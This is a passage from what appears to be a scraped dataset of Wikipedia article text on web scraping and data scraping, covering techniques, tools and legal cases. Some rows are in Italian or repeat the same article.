calls to filter the connections between the application layer and the lower layers. Application firewalls that hook into socket calls are also referred to as socket filters. citation needed Traffic Logs: Threat Prevention Logs: Audit Logs: Event Logs: Session Logs: DDoS Mitigation Logs: Geo-location Logs: URL Filtering Logs: User Activity Logs: VPN Logs: System Logs: Compliance Logs: Setting up a firewall is a complex and error-prone task. A network may face security issues due to configuration errors. 32 Firewall policy configuration is based on specific network type (e.g., public or private), and can be set up using firewall rules that either block or allow access to prevent potential attacks from hackers or malware. 33 |
674 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-21 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
675 | https://en.wikipedia.org/wiki/Web_scraping | https://it.wikipedia.org/wiki/Web_scraping | Il web scraping (detto anche web harvesting o web data extraction) una tecnica informatica di estrazione di dati da un sito web per mezzo di programmi software. Di solito, tali programmi simulano la navigazione umana nel World Wide Web utilizzando l'Hypertext Transfer Protocol (HTTP) o attraverso browser, come Internet Explorer o Mozilla Firefox. Strettamente correlato all'indicizzazione dei siti Internet, tale tecnica attuata mediante l'uso di bot dalla maggior parte dei motori di ricerca. D'altro canto, il web scraping si concentra di pi sulla trasformazione di dati non strutturati presenti in Rete, di solito in formato HTML, in metadati che possono essere memorizzati e analizzati in locale in un database. Il web harvesting altres affine alla web automation, che consiste nella simulazione della navigazione umana in Rete attraverso l'uso di software per computer. Esistono metodi utilizzati da alcuni siti web per prevenire il web scraping , come ad esempio rilevare e impedire ai bot la visualizzazione delle loro pagine. Per aggirare il problema esistono sistemi di web scraping che si affidano a tecniche come DOM parsing, Computer Vision e natural language processing per simulare la navigazione web umana. Grazie a queste tecniche possibile raccogliere i contenuti delle pagine web per l'analisi offline. 1 Pu essere usato per confrontare prezzi online, monitorare dati meteorologici, rilevare modifiche in un sito internet, nella ricerca scientifica, per il web mashup e il web data integration. Il web scraping il processo tramite cui si estraggono o si collezionano dati nel World Wide Web e, una volta ottenuti questi dati, possono essere utilizzati per diversi scopi. Le tecniche utilizzabili dipenderanno dai mezzi e dalle risorse a disposizione. Si parte da soluzioni dette "ad-hoc", che richiedono l'intervento dell'uomo per selezionare le informazioni utili, fino ad arrivare a sistemi completamente automatizzati, che attraverso il machine learning sgravano l'utente da alcuni compiti. Nemmeno la miglior tecnica di web scraping pu a volte rimpiazzare l'esame dell'occhio umano e il copia e incolla manuale. Per certi casi questa l'unica soluzione possibile, visto che alcune pagine web impediscono la raccolta automatica di dati. Esistono svariati software e tool che sono in grado di riconoscere automaticamente la struttura di una pagina web, senza che sia necessario alcun intervento umano per l'estrazione dei dati. Alcuni di questi software sono in grado di estrarre informazioni direttamente dalle API. Svariati siti web sono costituiti da pagine web generate automaticamente. La fonte da cui queste pagine ricavano informazioni sono per lo pi grandi database. I dati di categorie simili tra loro vengono organizzate in pagine o template comuni, per essere reperite con maggior facilit . I software che permettono tramite la rilevazione dei template l'estrazione di dati dello stesso tipo prendono il nome di wrapper. Utilizzando una combinazione di machine learning e computer vision si stanno sviluppando tecniche che permettono di analizzare ed estrarre dati da pagine web seguendo modelli simili. Esse quindi simuleranno il comportamento di un utente in carne ed ossa. In questa maniera il lavoro richiesto ai software di web scraping verr ridotto e si otterranno informazioni pi pertinenti. Per modificare o ispezionare una pagina web, vengono analizzati gli script lato client, che successivamente verranno organizzati in un DOM tree. DOM utilizzato principalmente per recuperare informazioni da documenti con una strutturazione non standard, cio dove gli elementi vengono trovati in modo casuale Infine (attraverso un browser web completo) sar possibile interrogare e recuperare informazioni dall'albero. Nella maggior parte delle pagine web sono presenti annotazioni semantiche (o markup) e metadati che possono essere facilmente reperiti e utilizzati per trovare frammenti di dati specifici. Questo potrebbe essere un semplice caso di DOM parsing se i metadati sono incorporati solamente nella pagina web. In caso contrario le annotazioni organizzate in diversi livelli vengono archiviate e gestite separatamente dalle pagine web, in modo tale che gli scraper possano recuperare le istruzioni e i dati da questo livello prima di eseguire lo scraping delle pagine. Ci sono diverse compagnie che hanno sviluppato piattaforme verticali specifiche per la raccolta. Essi creano e monitorano una moltitudine di bot per specifiche verticali, senza "human in the loop" (nessun coinvolgimento umano diretto), e senza lavoro relativo ad un sito specifico. La robustezza della piattaforma misurata tramite la qualit delle informazioni che reperisce (numero di campi) e dalla sua scalabilit (quanto velocemente pu scalare da centinaia a migliaia di siti). Questa scalabilit viene utilizzata nella maggior parte delle volte per indirizzare la lunga coda di siti che gli aggregatori comuni trovano complicati o troppo laboriosi per la raccolta dei contenuti. Approccio semplice ma efficace per estrarre informazioni dalle pagine web. Pu essere usato tramite il comando "grep" da riga di comando nei sistemi UNIX o attraverso le funzioni di expression-matching comuni dei linguaggi di programmazione (per esempio Perl o Python). Il web scraping una tecnica che permette l'estrazione di informazioni dai siti web; spesso include la trasformazione di dati non strutturati di pagine web in database per l'analisi o il riutilizzo del contenuto. Il riutilizzo pu essere sfruttato sul sito web dove abbiamo reperito le informazioni o per operazioni commerciali. Nella maggior parte dei casi, i bot, che costituiscono il 46% del traffico web, sono implementati da individui per eseguire il web scraping ad un ritmo molto pi elevato rispetto a quello che potrebbero mai avere gli umani. Attraverso l'analisi delle principali piattaforme e servizi di web scraping, Distil Networks ha sottolineato come la democratizzazione del web scraping permetta agli utenti di rubare senza problemi informazioni sensibili sul web. "Se i tuoi contenuti possono essere visualizzati sul Web, possono essere 'raschiati' (originale: "If your content can be viewed on the web, it can be scraped") 2 Il 38% delle aziende che si dedicano al web scraping lo fa per ottenere contenuti. Poich grazie alla mole di dati facilmente acquisibile possibile effettuare una vasta gamma di operazioni come, il confronto prezzi, il monitoraggio dei dati meteorologici e svariate ricerche. I servizi di Web scraping costano solo 3,33 all'ora. In media un progetto di web scraping costa all'incirca 135 . Il web scraper medio guadagna 58000 all'anno, mentre lavorando in un'azienda medio-grande specializzata nel web scraping si pu arrivare fino a 128000 all'anno. 3 L'amministratore di un sito web pu utilizzare vari metodi per rallentare o fermare un bot. Alcuni di questi sono: Questi sono alcuni dei software o tool disponibili per personalizzare le soluzioni di web scraping: |
676 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Data_processing | This category has the following 6 subcategories, out of 6 total. The following 48 pages are in this category, out of 48 total. This list may not reflect recent changes. |
677 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-26 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
678 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#References | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to 